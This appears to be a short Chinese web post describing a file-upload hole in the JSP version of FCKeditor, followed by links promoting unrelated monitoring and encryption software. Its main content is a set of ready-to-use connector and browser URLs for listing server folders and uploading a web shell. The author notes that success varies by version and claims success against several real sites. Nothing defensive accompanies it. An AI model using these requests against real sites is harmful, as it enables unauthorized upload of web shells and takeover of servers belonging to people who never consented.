FCKeditor JSP版漏洞

FCKeditor的JSP版漏洞 http: www xxx com fckeditor editor filemanager browser default
FCKeditor的JSP版漏洞

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
上传shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
跟版本有关系.并不是百分百成功. 测试成功几个站.
不能通杀.很遗憾.
您可能有感兴趣的文章
大势至上网行为管理系统核心功能,局域网安全管理,局域网上网行为监控

大势至上网行为管理系统核心优势,大势至上网行为监控系统特点

大势至电脑文件加密系统简介、大势至电脑文件加密系统优势

大势至共享文件管理系统的比较优势,专业的共享数据权限设置工具、公司共享文件管理系

大势至电脑文件防泄密系统的比较优势,专业的电脑数据防泄漏软件